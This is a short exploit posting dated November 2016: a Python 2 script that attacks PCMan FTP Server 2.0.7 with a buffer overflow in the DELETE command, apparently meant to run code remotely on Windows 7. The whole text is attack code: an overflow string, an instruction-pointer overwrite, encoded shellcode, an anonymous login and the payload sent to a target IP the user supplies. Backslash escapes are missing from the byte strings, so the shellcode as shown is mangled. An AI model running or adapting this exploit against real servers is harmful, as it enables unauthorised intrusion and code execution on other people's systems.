PCMAN FTP Server 2.0.7 DELETE Buffer Overflow
Posted on 02 November 2016
from ftplib import FTP print ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScrR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: PCmanftpd_delete_command_remotecode_exploit_Win7_x64_HUN_ENG # Date: 2016.10.31 # Exploit Author: Greg Priest # Version: Pcmanftpd 2.0.7 # Tested on: Windows 7 Enterprise x64 HUN/ENG ''' ftp_ip = raw_input("FTP server IP:") overflow = 'A' * 2005 eip = 'xCAx96xC9x76' + 'x90' * 10 shellcode=( "xdaxcaxbbxfdx11xa3xaexd9x74x24xf4x5ax31xc9" + "xb1x33x31x5ax17x83xc2x04x03xa7x02x41x5bxab" + "xcdx0cxa4x53x0ex6fx2cxb6x3fxbdx4axb3x12x71" + "x18x91x9exfax4cx01x14x8ex58x26x9dx25xbfx09" + "x1ex88x7fxc5xdcx8ax03x17x31x6dx3dxd8x44x6c" + "x7ax04xa6x3cxd3x43x15xd1x50x11xa6xd0xb6x1e" + "x96xaaxb3xe0x63x01xbdx30xdbx1exf5xa8x57x78" + "x26xc9xb4x9ax1ax80xb1x69xe8x13x10xa0x11x22" + "x5cx6fx2cx8bx51x71x68x2bx8ax04x82x48x37x1f" + "x51x33xe3xaax44x93x60x0cxadx22xa4xcbx26x28" + "x01x9fx61x2cx94x4cx1ax48x1dx73xcdxd9x65x50" + "xc9x82x3exf9x48x6ex90x06x8axd6x4dxa3xc0xf4" + "x9axd5x8ax92x5dx57xb1xdbx5ex67xbax4bx37x56" + "x31x04x40x67x90x61xbex2dxb9xc3x57xe8x2bx56" + "x3ax0bx86x94x43x88x23x64xb0x90x41x61xfcx16" + "xb9x1bx6dxf3xbdx88x8exd6xddx4fx1dxbax0fxea" + "xa5x59x50") remotecode = overflow + eip + shellcode ftp = FTP(ftp_ip) ftp.login('anonymous', 'hacker@hacker.net') print ftp.login print ''' Successfull Exploitation! ''' FTP.delete(ftp, remotecode)
